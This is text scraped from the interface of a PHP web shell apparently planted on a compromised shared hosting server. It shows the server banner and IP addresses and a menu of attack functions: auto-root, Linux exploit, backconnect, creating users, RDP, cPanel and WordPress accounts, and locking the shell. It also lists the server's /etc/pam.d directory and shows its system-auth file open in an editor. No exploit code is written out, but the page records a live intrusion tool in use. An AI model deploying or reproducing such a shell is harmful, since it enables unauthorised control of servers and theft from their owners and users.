Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.222.117.211
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
pam.d /
[ HOME SHELL ]
Name
Size
Permission
Action
chfn
342
B
-rw-r--r--
chsh
342
B
-rw-r--r--
config-util
232
B
-rw-r--r--
fingerprint-auth
701
B
-rw-r--r--
login
715
B
-rw-r--r--
other
154
B
-rw-r--r--
password-auth
786
B
-rw-r--r--
postlogin
398
B
-rw-r--r--
remote
640
B
-rw-r--r--
runuser
143
B
-rw-r--r--
runuser-l
138
B
-rw-r--r--
smartcard-auth
153
B
-rw-r--r--
su
657
B
-rw-r--r--
su-l
137
B
-rw-r--r--
system-auth
786
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : system-auth
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authselect is run. auth required pam_env.so auth required pam_hulk.so auth sufficient pam_unix.so try_first_pass nullok auth required pam_deny.so account required pam_unix.so password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so try_first_pass use_authtok nullok sha512 shadow password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so -session optional pam_systemd.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_unix.so
Close